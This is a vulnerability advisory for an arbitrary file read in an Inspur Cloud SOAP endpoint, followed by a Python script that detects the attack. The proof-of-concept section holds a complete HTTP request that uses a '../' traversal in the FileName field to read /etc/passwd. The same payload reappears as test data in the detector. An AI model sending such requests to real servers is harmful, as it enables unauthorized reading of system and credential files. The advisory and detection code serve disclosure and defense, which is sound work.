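Inspur Cloud (浪潮云) /cwbase/service/cepp/PurBidSupplementSrv.asmx File Read Vulnerability

Date: 2025-07-08 | Affected software: Inspur Cloud | PoC: public

Vulnerability description

The /cwbase/service/cepp/PurBidSupplementSrv.asmx endpoint of Inspur Cloud has a file read vulnerability. An attacker can read arbitrary files on the server by sending a crafted SOAP request, which may lead to disclosure of sensitive information.

PoC code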

POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 296
Content-Type: application/soap+xml; charset=utf-8
User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/109.0 Safari/537.36

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.example.com/">
  <soapenv:Header/>
  <soapenv:Body>
    <web:GetFile>
      <web:FileName>../../../../etc/passwd</web:FileName>
    </web:GetFile>
  </soapenv:Body>
</soapenv:Envelope>
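
A detection check for the request shape shown above, as an added example that is not part of the original advisory or of the vendor's code: it flags requests to this endpoint whose FileName element carries a traversal sequence or an absolute path. It assumes the request path and body are available (for example from a WAF or reverse-proxy capture); the function names and sample bodies are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Endpoint named in the advisory, compared in lower case
# (assumption: the server ignores path case, as IIS does).
ENDPOINT = "/cwbase/service/cepp/purbidsupplementsrv.asmx"
# Fallback for bodies that are not well-formed XML (e.g. an unbound prefix).
FILENAME_RE = re.compile(r"<(?:[\w.-]+:)?FileName\b[^>]*>(.*?)</", re.I | re.S)

# Constructed sample bodies; the first carries the FileName value from the PoC.
NS = ('xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
      'xmlns:web="http://webservice.example.com/"')
SAMPLE = ("<s:Envelope " + NS + "><s:Body><web:GetFile><web:FileName>%s"
          "</web:FileName></web:GetFile></s:Body></s:Envelope>")
POC_BODY = SAMPLE % "../../../../etc/passwd"
BENIGN_BODY = SAMPLE % "bid_2025_001.pdf"

def filename_values(body):
    """Return the text of every FileName element, whatever its namespace."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return FILENAME_RE.findall(body)
    return [el.text or "" for el in root.iter()
            if el.tag.rsplit("}", 1)[-1].lower() == "filename"]

def is_traversal(value):
    """True if the value climbs out of its directory or is an absolute path."""
    v = value.strip()
    for _ in range(2):              # undo single and double URL-encoding
        v = unquote(v)
    v = v.replace("\\", "/")        # treat Windows separators the same way
    return (".." in v.split("/") or v.startswith("/")
            or re.match(r"[A-Za-z]:/", v) is not None)

def flag_request(path, body):
    """Return the suspicious FileName values of one request, else []."""
    if path.split("?", 1)[0].lower() != ENDPOINT:
        return []
    return [v for v in filename_values(body) if is_traversal(v)]

if __name__ == "__main__":
    url = "/cwbase/service/cepp/PurBidSupplementSrv.asmx"
    for name, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(name, flag_request(url, body))
```

When running this over untrusted traffic at volume, swap the standard-library parser for a hardened one such as defusedxml.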
